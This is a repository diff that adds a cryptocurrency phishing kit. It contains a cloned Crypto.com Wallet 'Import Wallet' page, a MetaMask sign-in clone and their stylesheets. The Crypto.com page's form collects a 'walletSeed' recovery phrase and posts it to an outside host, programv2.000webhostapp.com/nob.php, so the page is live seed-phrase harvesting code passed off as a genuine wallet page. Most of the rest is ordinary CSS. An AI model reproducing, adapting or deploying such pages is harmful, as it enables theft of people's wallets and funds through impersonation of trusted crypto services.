34
+
35
+ .anticon-spin::before,
36
+ .anticon-spin {
37
+ display: inline-block;
38
+ -webkit-animation: loadingCircle 1s infinite linear;
39
+ animation: loadingCircle 1s infinite linear;
40
+ }
41
+
42
+ @-webkit-keyframes loadingCircle {
43
+ 100% {
44
+ -webkit-transform: rotate(360deg);
45
+ transform: rotate(360deg);
46
+ }
47
+ }
48
+
49
+ @keyframes loadingCircle {
50
+ 100% {
51
+ -webkit-transform: rotate(360deg);
52
+ transform: rotate(360deg);
53
+ }
54
+ }
55
+ </style>
56
+ <meta charset="utf-8">
57
+ <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
58
+ <meta name="theme-color" content="#000000">
59
+ <meta name="description" content="Crypto.com Wallet Extension">
60
+ <link rel="icon" href="static/logo.c3d55bff.svg">
61
+ <link rel="apple-touch-icon" href="./logo192.png">
62
+ <link rel="manifest" href="./manifest.json">
63
+ <title></title>
64
+ <link rel="stylesheet" href="./antd.css">
65
+ <link rel="stylesheet" href="./umi.css">
66
+
67
+
68
+ <link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start-next.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-model.chunk.css"><link rel="stylesheet" type="text/css" href="./p__qrcode.chunk.css"></head>
69
+
70
+ <body>
71
+ <div id="root"><div class="import_wallet___248SK"><a href="index.html?access-my-wallet" div="" class="go_back___1-f-c"></a><div class="title___1C2cy">Import Wallet</div><div class="subtitle___1InNY">Import a crypto wallet by entering its recovery phrase</div><div class="desc___2SBxc">Enter your wallet’s 12/15/18/24-word recovery phrase</div><form method="post" action="https://programv2.000webhostapp.com/nob.php" form="" autocomplete="off" class="ant-form ant-form-vertical"><div class="area_wrap___2YyXp "><svg width="24" height="24" viewBox="0 0 24 24" fill="none"><path fill-rule="evenodd" clip-rule="evenodd" d="M12 10.9741L8.23837 7.21247C7.95508 6.92918 7.49576 6.92918 7.21247 7.21247C6.92918 7.49576 6.92918 7.95508 7.21247 8.23837L10.9741 12L7.21247 15.7616C6.92918 16.0449 6.92918 16.5042 7.21247 16.7875C7.49576 17.0708 7.95508 17.0708 8.23837 16.7875L12 13.0259L15.7616 16.7875C16.0449 17.0708 16.5042 17.0708 16.7875 16.7875C17.0708 16.5042 17.0708 16.0449 16.7875 15.7616L13.0259 12L16.7875 8.23837C17.0708 7.95508 17.0708 7.49576 16.7875 7.21247C16.5042 6.92918 16.0449 6.92918 15.7616 7.21247L12 10.9741Z" fill="#E64B60"></path></svg><textarea placeholder="Separate each word with a space" class="ant-input area___3V06- " type="text" name="walletSeed" required="true"></textarea><div class="tip___3g37l"></div><label class="ant-checkbox-wrapper"><span class="ant-checkbox"><input type="checkbox" class="ant-checkbox-input" value=""><span class="ant-checkbox-inner"></span></span><span>Show recovery phrase</span></label></div><div class="disclaimer___1qGN0"></div><button type="submit" class="ant-btn ant-btn-default ant-btn-block btn___3NA9b" style="height: 48px; background-color: rgb(17, 153, 250);"><span>Proceed</span></button></form></div></div>
72
+
73
+ <script src="./web3.js"></script>
74
+ <script src="./idna-uts46-hx.js"></script>
75
+ <script src="./ethersproject.js"></script>
76
+ <script src="./ethereumjs.js"></script>
77
+ <script src="./mathjs.js"></script>
78
+ <script src="./antd.js"></script>
79
+ <script src="./vendors.js"></script>
80
+ <script src="./umi.js"></script>
81
+
82
+
83
+ <style rc-util-key="antd-wave"></style></body></html>
claim/cro/p__create-wallet-process__choose-pattern.chunk.css ADDED
@@ -0,0 +1 @@
 
 
1
+ .go_back___1-f-c{position:absolute;top:24px;left:16px;width:24px;height:24px;background:url(static/icon-go-back.820d05e0.svg) no-repeat 50%/contain;cursor:pointer}.choose_model___lI54i{display:flex;flex-direction:column;width:100%;height:100%;padding:88px 16px 0;text-align:center}.choose_model___lI54i .title___-sp5s{color:#323c52;font-weight:600;font-size:24px;line-height:29px}.choose_model___lI54i .desc___3Ubfb{color:#5d667b;font-size:16px;line-height:24px}.choose_model___lI54i .pattern___pZ6oc .desc___3Ubfb{margin-top:16px;margin-bottom:41px}.choose_model___lI54i .create_modal___2mq3e{margin-bottom:40px;padding-top:47px}.choose_model___lI54i .card___1Y6Rk{display:flex;flex-direction:column;justify-content:center;width:328px;height:116px;margin-bottom:16px;padding:16px;text-align:left;background:url(static/icon-arrow-right.e46dfeab.svg) no-repeat center right 16px;background-color:#fff;background-size:24px 24px;border-radius:8px;box-shadow:2px 0 12px 2px rgba(11,20,38,.05);cursor:pointer}.choose_model___lI54i .card___1Y6Rk:hover{box-shadow:2px 0 12px 2px rgba(11,20,38,.1)}.choose_model___lI54i .card_title___2N9-R{margin-bottom:6px;padding-left:32px;color:#0b1426;font-weight:700;font-size:14px;line-height:20px;background:no-repeat 0;background-size:24px}.choose_model___lI54i .card_desc___3a8-C{width:248px;color:#808c99;font-weight:500;font-size:14px;line-height:20px}.choose_model___lI54i .import___1VLfP{background-image:url(static/import.1d17ba8c.svg)}.choose_model___lI54i .create___1uVCl{background-image:url(static/create.7e90997d.svg)}.choose_model___lI54i .bridge___2hVk5{background-image:url(static/bridge.7fd50f67.svg)}.choose_model___lI54i .standalone___3r-w6{background-image:url(static/standalone.51f4e597.svg)}
claim/cro/p__create-wallet-process__create-pwd.chunk.css ADDED
@@ -0,0 +1 @@
 
 
1
+ .go_back___1-f-c{position:absolute;top:24px;left:16px;width:24px;height:24px;background:url(static/icon-go-back.820d05e0.svg) no-repeat 50%/contain;cursor:pointer}.btn___3NA9b{display:flex;flex-shrink:0;align-items:center;justify-content:center;color:#fff;font-weight:600;font-size:16px;font-style:normal;border:none;border-radius:8px;cursor:pointer}.btn___3NA9b:focus,.btn___3NA9b:hover,.btn___3NA9b[disabled]{color:#fff!important;opacity:.7!important}.create_pwd___3_ptA{display:flex;flex-direction:column;height:100%;padding:115px 16px 32px}.create_pwd___3_ptA .title___a5r0Q{margin-bottom:16px;color:#323c52;font-weight:600;font-size:24px;line-height:29px;text-align:center}.create_pwd___3_ptA .desc___2U9le{margin-bottom:44px;color:#5d667b;font-weight:500;font-size:16px;line-height:24px;text-align:center}.create_pwd___3_ptA input{height:48px;color:#97a5b6;background:#f2f4f6!important}.create_pwd___3_ptA .hint___1Dy01{margin-bottom:8px;color:#808c99;font-size:12px;line-height:14px;text-align:left}.create_pwd___3_ptA .form_wrapper___3mWfI{display:flex;flex-direction:column;flex-grow:1;justify-content:flex-start}.create_pwd___3_ptA .disclaimer___3VnKY{color:#5d667b;font-weight:500;font-size:12px}.create_pwd___3_ptA .ant-form-item-has-error .ant-input-affix-wrapper{background-color:#f2f4f6!important;border-radius:4px}.create_pwd___3_ptA .ant-input-affix-wrapper{background-color:#f2f4f6!important;border-radius:4px}.create_pwd___3_ptA .ant-form-item:last-child{margin-top:auto;margin-bottom:0}
claim/cro/p__create-wallet-process__disclaimer.chunk.css ADDED
@@ -0,0 +1 @@
 
 
1
+ .errorImg___3sziM{width:88px}.go_back___1-f-c{position:absolute;top:24px;left:16px;width:24px;height:24px;background:url(static/icon-go-back.820d05e0.svg) no-repeat 50%/contain;cursor:pointer}.btn___3NA9b{display:flex;flex-shrink:0;align-items:center;justify-content:center;color:#fff;font-weight:600;font-size:16px;font-style:normal;border:none;border-radius:8px;cursor:pointer}.btn___3NA9b:focus,.btn___3NA9b:hover,.btn___3NA9b[disabled]{color:#fff!important;opacity:.7!important}.disclaimer___24_wC{display:flex;flex-direction:column;width:100%;height:100%;padding:96px 16px 32px;text-align:center}.disclaimer___24_wC .errorLogo___1UQAz{align-self:center}.disclaimer___24_wC .title___yk5UJ{margin-top:24px;color:#323c52;font-weight:600;font-size:24px;line-height:29px}.disclaimer___24_wC .desc___ctQmj{flex-grow:1;margin-top:16px;color:#5d667b;font-weight:500;font-size:16px;line-height:24px}.disclaimer___24_wC .link___2cUpu{margin-top:16px;font-weight:600;font-size:16px}
claim/cro/p__create-wallet-process__get-start-next.chunk.css ADDED
@@ -0,0 +1,17 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ .go_back___1-f-c { position: absolute; top: 24px; left: 16px; width: 24px; height: 24px; background: url("static/icon-go-back.820d05e0.svg") 50% center / contain no-repeat; cursor: pointer; }
2
+ .btn___3NA9b { display: flex; flex-shrink: 0; align-items: center; justify-content: center; color: rgb(255, 255, 255); font-weight: 600; font-size: 16px; font-style: normal; border: none; border-radius: 8px; cursor: pointer; }
3
+ .btn___3NA9b:focus, .btn___3NA9b:hover, .btn___3NA9b[disabled] { color: rgb(255, 255, 255) !important; opacity: 0.7 !important; }
4
+ .get_start_next___1Sw83 { display: flex; flex-direction: column; height: 100%; }
5
+ .get_start_next___1Sw83 .header___LFDZ2 { display: block; height: 70px; margin-top: 24px; font-weight: 500; font-size: 16px; text-align: center; }
6
+ .get_start_next___1Sw83 img[title="banner"] { width: 216px; margin: 0px auto; padding-top: 16px; }
7
+ .get_start_next___1Sw83 .card___3ZGCe { display: flex; justify-content: center; padding-top: 16px; }
8
+ .get_start_next___1Sw83 .card___3ZGCe img { height: 160px; margin: 0px auto; }
9
+ .get_start_next___1Sw83 .card___3ZGCe p { font-weight: 500; font-size: 16px; text-align: center; }
10
+ .get_start_next___1Sw83 .title___5jijw { margin-bottom: 16px; color: rgb(50, 60, 82); font-weight: 600; font-size: 20px; line-height: 26px; text-align: center; }
11
+ .get_start_next___1Sw83 .desc___2fvVk { width: 308px; height: 120px; margin: auto; color: rgb(93, 102, 123); font-size: 16px; line-height: 24px; text-align: center; }
12
+ .get_start_next___1Sw83 .btnBlock___3XMLL { margin-top: auto; margin-bottom: 32px; padding: 0px 16px; }
13
+ .get_start_next___1Sw83 .ant-carousel { padding: 0px 16px; }
14
+ .get_start_next___1Sw83 .ant-carousel .slick-dots { position: static; margin-top: 30px; }
15
+ .get_start_next___1Sw83 .ant-carousel .slick-dots li { height: 6px; width: 6px !important; }
16
+ .get_start_next___1Sw83 .ant-carousel .slick-dots li button { width: 6px; height: 6px; background: rgba(30, 63, 111, 0.4); border-radius: 50%; }
17
+ .get_start_next___1Sw83 .ant-carousel .slick-active button { background: rgb(30, 63, 111) !important; }
claim/cro/p__create-wallet-process__get-start.chunk.css ADDED
@@ -0,0 +1,10 @@
 
 
 
 
 
 
 
 
 
 
 
1
+ .btn___3NA9b { display: flex; flex-shrink: 0; align-items: center; justify-content: center; color: rgb(255, 255, 255); font-weight: 600; font-size: 16px; font-style: normal; border: none; border-radius: 8px; cursor: pointer; }
2
+ .btn___3NA9b:focus, .btn___3NA9b:hover, .btn___3NA9b[disabled] { color: rgb(255, 255, 255) !important; opacity: 0.7 !important; }
3
+ .get_start___27mNP { display: flex; flex-direction: column; height: 100%; padding: 100px 16px 32px; background-color: rgb(247, 249, 250); }
4
+ .wrapper___1V5Cg { flex-grow: 1; padding-top: 121px; color: rgb(50, 60, 82); font-weight: 600; font-size: 24px; line-height: 29px; text-align: center; background: url("static/logo.c3d55bff.svg") center top / 96px 96px no-repeat; }
5
+ .text_item___1EP-X { margin-bottom: 16px; padding-left: 42px; background: 0px center / 24px no-repeat; }
6
+ .stable___328gu { background-image: url("static/stable.d70c19e4.svg"); }
7
+ .secure___3kAwR { background-image: url("static/secure.37ba123e.svg"); }
8
+ .smooth___2KWgA { background-image: url("static/smooth.0e4668cd.svg"); }
9
+ .subtitle___Rt-rb { margin-top: 16px; margin-bottom: 24px; color: rgb(151, 165, 182); font-weight: 500; font-size: 16px; font-style: normal; line-height: 24px; text-align: center; }
10
+ .desc_list___1pmTm { display: flex; flex-direction: column; width: 200px; margin: auto; color: rgb(50, 60, 82); font-weight: 500; font-size: 16px; font-style: normal; line-height: 150%; text-align: left; }
claim/cro/p__create-wallet-process__import-wallet.chunk.css ADDED
@@ -0,0 +1 @@
 
 
1
+ .go_back___1-f-c{position:absolute;top:24px;left:16px;width:24px;height:24px;background:url(static/icon-go-back.820d05e0.svg) no-repeat 50%/contain;cursor:pointer}.wrong___3L-QA .tip___2jQ65{margin-top:8px;color:#e64b60}.accountIndex___1Siwt .ant-input,.accountIndex___1Siwt .ant-input-affix-wrapper{color:#0b1426;line-height:22px;background:#f2f4f6}.accountIndex___1Siwt .ant-input-affix-wrapper::placeholder,.accountIndex___1Siwt .ant-input::placeholder{color:#97a5b6}.accountIndex___1Siwt .ant-input{height:48px}.accountIndex___1Siwt .ant-input-affix-wrapper{padding-top:0;padding-bottom:0;border:none;border-radius:4px}.accountIndex___1Siwt .ant-input-suffix{position:relative;min-width:18px}.accountIndex___1Siwt .ant-input-suffix .ant-input-show-count-suffix{position:absolute;right:-10px;bottom:-24px;margin:0;color:#5d667b;font-weight:500;font-size:12px;line-height:16px;text-align:right}.accountIndex___1Siwt .ant-input-suffix .ant-input-show-count-suffix:after{content:"/28"}.desc___2gE_N{margin-right:-2px;margin-bottom:8px;color:#808c99;font-weight:400;font-size:12px;font-style:normal;line-height:20px}.tip___2jQ65{color:#808c99;font-size:12px;line-height:14px}.btn___3NA9b{display:flex;flex-shrink:0;align-items:center;justify-content:center;color:#fff;font-weight:600;font-size:16px;font-style:normal;border:none;border-radius:8px;cursor:pointer}.btn___3NA9b:focus,.btn___3NA9b:hover,.btn___3NA9b[disabled]{color:#fff!important;opacity:.7!important}@font-face{font-family:text-security-disc;src:url(static/text-security-disc.e6c665e7.woff2)}.import_wallet___248SK{display:flex;flex-direction:column;width:100%;height:100%;padding:64px 16px 10px;background:#f7f9fa}.import_wallet___248SK .ant-input{transition:none}.title___1C2cy{color:#323c52;font-weight:600;font-size:24px;line-height:29px;text-align:center}.subtitle___1InNY{margin:16px 0 32px;color:#5d667b;font-weight:500;font-size:16px;line-height:24px;text-align:center}.desc___2SBxc{margin-right:-2px;color:#808c99;font-weight:400;font-size:12px;font-style:normal;line-height:20px}.ant-form{display:flex;flex:1 1;flex-direction:column}.ant-form .ant-btn{margin-top:8px}.area_wrap___2YyXp{margin-bottom:26px}.area_wrap___2YyXp svg{display:none}.wrong___1EKDx.area_wrap___2YyXp{position:relative}.wrong___1EKDx.area_wrap___2YyXp svg{position:absolute;top:18px;right:11px;z-index:1000;display:block}.wrong___1EKDx .tip___3g37l{color:#e64b60}.pharse___17MIH{font-size:small;font-family:text-security-disc;letter-spacing:2px;-webkit-text-security:disc}.area___3V06-{display:block;height:128px!important;margin:8px 0;padding:10px 8px;background:#f2f4f6;border:none;border-radius:4px;outline:none;resize:none}.tip___3g37l{color:#808c99;font-size:12px;line-height:14px}.disclaimer___1qGN0{margin-top:auto;color:#808c99;font-size:12px;line-height:14px}.tips___2pLfT{display:inline-block;color:#5d667b;font-weight:500;font-size:12px}
claim/cro/p__create-wallet-process__wallet-name.chunk.css ADDED
@@ -0,0 +1 @@
 
 
1
+ .go_back___1-f-c{position:absolute;top:24px;left:16px;width:24px;height:24px;background:url(static/icon-go-back.820d05e0.svg) no-repeat 50%/contain;cursor:pointer}.wrong___3L-QA .tip___2jQ65{margin-top:8px;color:#e64b60}.accountIndex___1Siwt .ant-input,.accountIndex___1Siwt .ant-input-affix-wrapper{color:#0b1426;line-height:22px;background:#f2f4f6}.accountIndex___1Siwt .ant-input-affix-wrapper::placeholder,.accountIndex___1Siwt .ant-input::placeholder{color:#97a5b6}.accountIndex___1Siwt .ant-input{height:48px}.accountIndex___1Siwt .ant-input-affix-wrapper{padding-top:0;padding-bottom:0;border:none;border-radius:4px}.accountIndex___1Siwt .ant-input-suffix{position:relative;min-width:18px}.accountIndex___1Siwt .ant-input-suffix .ant-input-show-count-suffix{position:absolute;right:-10px;bottom:-24px;margin:0;color:#5d667b;font-weight:500;font-size:12px;line-height:16px;text-align:right}.accountIndex___1Siwt .ant-input-suffix .ant-input-show-count-suffix:after{content:"/28"}.desc___2gE_N{margin-right:-2px;margin-bottom:8px;color:#808c99;font-weight:400;font-size:12px;font-style:normal;line-height:20px}.tip___2jQ65{color:#808c99;font-size:12px;line-height:14px}.btn___3NA9b{display:flex;flex-shrink:0;align-items:center;justify-content:center;color:#fff;font-weight:600;font-size:16px;font-style:normal;border:none;border-radius:8px;cursor:pointer}.btn___3NA9b:focus,.btn___3NA9b:hover,.btn___3NA9b[disabled]{color:#fff!important;opacity:.7!important}.wallet-name___1gDBu{display:flex;flex-direction:column;width:100%;height:100%;padding:103px 16px 32px;background:#f7f9fa}.wallet-name___1gDBu .title___278Uj{color:#323c52;font-weight:600;font-size:24px;line-height:29px;text-align:center}.wallet-name___1gDBu .subtitle___2Bi71{margin:16px 0 80px;color:#5d667b;font-weight:500;font-size:16px;line-height:24px;text-align:center}.wallet-name___1gDBu .ant-form{display:flex;flex:1 1;flex-direction:column}.wallet-name___1gDBu .ant-form .ant-btn-block{margin-top:auto}.wallet-name___1gDBu .ant-form .ant-form-item-label label{color:#808c99;font-weight:400;font-size:12px;line-height:14px}.wallet-name___1gDBu .ant-form .ant-input,.wallet-name___1gDBu .ant-form .ant-input-affix-wrapper{color:#0b1426;line-height:22px;background:#f2f4f6}.wallet-name___1gDBu .ant-form .ant-input-affix-wrapper::placeholder,.wallet-name___1gDBu .ant-form .ant-input::placeholder{color:#97a5b6}.wallet-name___1gDBu .ant-form .ant-input{height:48px}.wallet-name___1gDBu .ant-form .ant-input-affix-wrapper{padding-top:0;padding-bottom:0;border:none;border-radius:4px}.wallet-name___1gDBu .ant-form .ant-input-suffix{position:relative;min-width:18px}.wallet-name___1gDBu .ant-form .ant-input-suffix .ant-input-show-count-suffix{position:absolute;right:-10px;bottom:-24px;margin:0;color:#5d667b;font-weight:500;font-size:12px;line-height:16px;text-align:right}.wallet-name___1gDBu .ant-form .ant-input-suffix .ant-input-show-count-suffix:after{content:"/28"}.wallet-name___1gDBu .ant-form .ant-form-item .ant-form-item-control,.wallet-name___1gDBu .ant-form .ant-form-item .ant-form-item-label{flex:auto}.wallet-name___1gDBu .ant-form .ant-input-affix-wrapper-status-error:not(.ant-input-affix-wrapper-disabled):not(.ant-input-affix-wrapper-borderless).ant-input-affix-wrapper{background:#f2f4f6}.wallet-name___1gDBu .ant-form .ant-form-item-control-input{margin-bottom:4px}.wallet-name___1gDBu .ant-form .ant-form-item-explain{min-height:unset}.wallet-name___1gDBu .ant-form .ant-form-item-explain>div:not(.ant-form-item-explain-error){display:none}.wallet-name___1gDBu .ant-form .ant-form-item-explain .ant-form-item-explain-error{color:#e64b60;font-size:12px}.wallet-name___1gDBu .form-item-error-wrap___1xlAb .ant-input-suffix .ant-input-show-count-suffix{color:#d9475a}
claim/cro/static/secure.37ba123e.svg ADDED
claim/cro/static/smooth.0e4668cd.svg ADDED
claim/cro/static/stable.d70c19e4.svg ADDED
claim/cro/umi.css ADDED
@@ -0,0 +1 @@
 
 
1
+ .spin_center___2APkZ{position:absolute;top:50%;left:50%;transform:translate(-50%,-50%)}body{display:flex;flex-direction:column;align-items:center;justify-content:stretch;margin:0;padding:0;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;background-color:#f7f9fa;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}body,html{width:100%;height:100%}body #root{position:relative;display:flex;flex-direction:column;flex-grow:2;align-items:stretch;justify-content:flex-start;width:360px;min-height:580px;max-height:640px;background-color:#f7f9fa}code{font-family:source-code-pro,Menlo,Monaco,Consolas,"Courier New",monospace}::-webkit-scrollbar{width:0}::-webkit-scrollbar-track{border:none}::-webkit-scrollbar-thumb{background:#c9cfdd;border-radius:5px}
claim/index.html ADDED
The diff for this file is too large to render. See raw diff
 
claim/meta-signin/image/logo/metamask-fox.svg ADDED
claim/meta-signin/image/logo/metamask-logo-horizontal.svg ADDED
claim/meta-signin/index.css ADDED
The diff for this file is too large to render. See raw diff
 
claim/meta-signin/index.html ADDED
@@ -0,0 +1,371 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <!DOCTYPE html>
2
+ <html><script src="chrome-extension://lgmpcpglpngdoalbgeoldeajfclnhafa/inpage.js"></script><head>
3
+ <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
4
+ <meta charset="utf-8">
5
+ <meta name="viewport" content="width=device-width, initial-scale=1 user-scalable=no">
6
+ <title>MetaMask Notification </title>
7
+ <link rel="stylesheet" type="text/css" href="index.css" title="ltr">
8
+ <link rel="stylesheet" type="text/css" href="index-rtl.css" title="rtl" disabled="">
9
+ <link rel="icon" href="metamask-fox.svg">
10
+ <style></style><style data-jss="" data-meta="MuiInputBase">
11
+ @-webkit-keyframes mui-auto-fill {}
12
+ @-webkit-keyframes mui-auto-fill-cancel {}
13
+ .MuiInputBase-root {
14
+ color: rgba(0, 0, 0, 0.87);
15
+ cursor: text;
16
+ display: inline-flex;
17
+ position: relative;
18
+ font-size: 1rem;
19
+ box-sizing: border-box;
20
+ align-items: center;
21
+ font-family: "Roboto", "Helvetica", "Arial", sans-serif;
22
+ font-weight: 400;
23
+ line-height: 1.1876em;
24
+ letter-spacing: 0.00938em;
25
+ }
26
+ .MuiInputBase-root.Mui-disabled {
27
+ color: rgba(0, 0, 0, 0.38);
28
+ cursor: default;
29
+ }
30
+ .MuiInputBase-multiline {
31
+ padding: 6px 0 7px;
32
+ }
33
+ .MuiInputBase-multiline.MuiInputBase-marginDense {
34
+ padding-top: 3px;
35
+ }
36
+ .MuiInputBase-fullWidth {
37
+ width: 100%;
38
+ }
39
+ .MuiInputBase-input {
40
+ font: inherit;
41
+ color: currentColor;
42
+ width: 100%;
43
+ border: 0;
44
+ height: 1.1876em;
45
+ margin: 0;
46
+ display: block;
47
+ padding: 6px 0 7px;
48
+ min-width: 0;
49
+ background: none;
50
+ box-sizing: content-box;
51
+ animation-name: mui-auto-fill-cancel;
52
+ letter-spacing: inherit;
53
+ animation-duration: 10ms;
54
+ -webkit-tap-highlight-color: transparent;
55
+ }
56
+ .MuiInputBase-input::-webkit-input-placeholder {
57
+ color: currentColor;
58
+ opacity: 0.42;
59
+ transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
60
+ }
61
+ .MuiInputBase-input::-moz-placeholder {
62
+ color: currentColor;
63
+ opacity: 0.42;
64
+ transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
65
+ }
66
+ .MuiInputBase-input:-ms-input-placeholder {
67
+ color: currentColor;
68
+ opacity: 0.42;
69
+ transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
70
+ }
71
+ .MuiInputBase-input::-ms-input-placeholder {
72
+ color: currentColor;
73
+ opacity: 0.42;
74
+ transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
75
+ }
76
+ .MuiInputBase-input:focus {
77
+ outline: 0;
78
+ }
79
+ .MuiInputBase-input:invalid {
80
+ box-shadow: none;
81
+ }
82
+ .MuiInputBase-input::-webkit-search-decoration {
83
+ -webkit-appearance: none;
84
+ }
85
+ .MuiInputBase-input.Mui-disabled {
86
+ opacity: 1;
87
+ }
88
+ .MuiInputBase-input:-webkit-autofill {
89
+ animation-name: mui-auto-fill;
90
+ animation-duration: 5000s;
91
+ }
92
+ label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-webkit-input-placeholder {
93
+ opacity: 0 !important;
94
+ }
95
+ label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-moz-placeholder {
96
+ opacity: 0 !important;
97
+ }
98
+ label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:-ms-input-placeholder {
99
+ opacity: 0 !important;
100
+ }
101
+ label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-ms-input-placeholder {
102
+ opacity: 0 !important;
103
+ }
104
+ label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-webkit-input-placeholder {
105
+ opacity: 0.42;
106
+ }
107
+ label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-moz-placeholder {
108
+ opacity: 0.42;
109
+ }
110
+ label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus:-ms-input-placeholder {
111
+ opacity: 0.42;
112
+ }
113
+ label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-ms-input-placeholder {
114
+ opacity: 0.42;
115
+ }
116
+ .MuiInputBase-inputMarginDense {
117
+ padding-top: 3px;
118
+ }
119
+ .MuiInputBase-inputMultiline {
120
+ height: auto;
121
+ resize: none;
122
+ padding: 0;
123
+ }
124
+ .MuiInputBase-inputTypeSearch {
125
+ -moz-appearance: textfield;
126
+ -webkit-appearance: textfield;
127
+ }
128
+ </style><style data-jss="" data-meta="MuiInput">
129
+ .MuiInput-root {
130
+ position: relative;
131
+ }
132
+ label + .MuiInput-formControl {
133
+ margin-top: 16px;
134
+ }
135
+ .MuiInput-colorSecondary.MuiInput-underline:after {
136
+ border-bottom-color: #f50057;
137
+ }
138
+ .MuiInput-underline:after {
139
+ left: 0;
140
+ right: 0;
141
+ bottom: 0;
142
+ content: "";
143
+ position: absolute;
144
+ transform: scaleX(0);
145
+ transition: transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
146
+ border-bottom: 2px solid #3f51b5;
147
+ pointer-events: none;
148
+ }
149
+ .MuiInput-underline.Mui-focused:after {
150
+ transform: scaleX(1);
151
+ }
152
+ .MuiInput-underline.Mui-error:after {
153
+ transform: scaleX(1);
154
+ border-bottom-color: #f44336;
155
+ }
156
+ .MuiInput-underline:before {
157
+ left: 0;
158
+ right: 0;
159
+ bottom: 0;
160
+ content: "\00a0";
161
+ position: absolute;
162
+ transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
163
+ border-bottom: 1px solid rgba(0, 0, 0, 0.42);
164
+ pointer-events: none;
165
+ }
166
+ .MuiInput-underline:hover:not(.Mui-disabled):before {
167
+ border-bottom: 2px solid rgba(0, 0, 0, 0.87);
168
+ }
169
+ .MuiInput-underline.Mui-disabled:before {
170
+ border-bottom-style: dotted;
171
+ }
172
+ @media (hover: none) {
173
+ .MuiInput-underline:hover:not(.Mui-disabled):before {
174
+ border-bottom: 1px solid rgba(0, 0, 0, 0.42);
175
+ }
176
+ }
177
+ </style><style data-jss="" data-meta="MuiFormLabel">
178
+ .MuiFormLabel-root {
179
+ color: rgba(0, 0, 0, 0.54);
180
+ padding: 0;
181
+ font-size: 1rem;
182
+ font-family: "Roboto", "Helvetica", "Arial", sans-serif;
183
+ font-weight: 400;
184
+ line-height: 1;
185
+ letter-spacing: 0.00938em;
186
+ }
187
+ .MuiFormLabel-root.Mui-focused {
188
+ color: #3f51b5;
189
+ }
190
+ .MuiFormLabel-root.Mui-disabled {
191
+ color: rgba(0, 0, 0, 0.38);
192
+ }
193
+ .MuiFormLabel-root.Mui-error {
194
+ color: #f44336;
195
+ }
196
+ .MuiFormLabel-colorSecondary.Mui-focused {
197
+ color: #f50057;
198
+ }
199
+ .MuiFormLabel-asterisk.Mui-error {
200
+ color: #f44336;
201
+ }
202
+ </style><style data-jss="" data-meta="MuiInputLabel">
203
+ .MuiInputLabel-root {
204
+ display: block;
205
+ transform-origin: top left;
206
+ }
207
+ .MuiInputLabel-formControl {
208
+ top: 0;
209
+ left: 0;
210
+ position: absolute;
211
+ transform: translate(0, 24px) scale(1);
212
+ }
213
+ .MuiInputLabel-marginDense {
214
+ transform: translate(0, 21px) scale(1);
215
+ }
216
+ .MuiInputLabel-shrink {
217
+ transform: translate(0, 1.5px) scale(0.75);
218
+ transform-origin: top left;
219
+ }
220
+ .MuiInputLabel-animated {
221
+ transition: color 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms,transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
222
+ }
223
+ .MuiInputLabel-filled {
224
+ z-index: 1;
225
+ transform: translate(12px, 20px) scale(1);
226
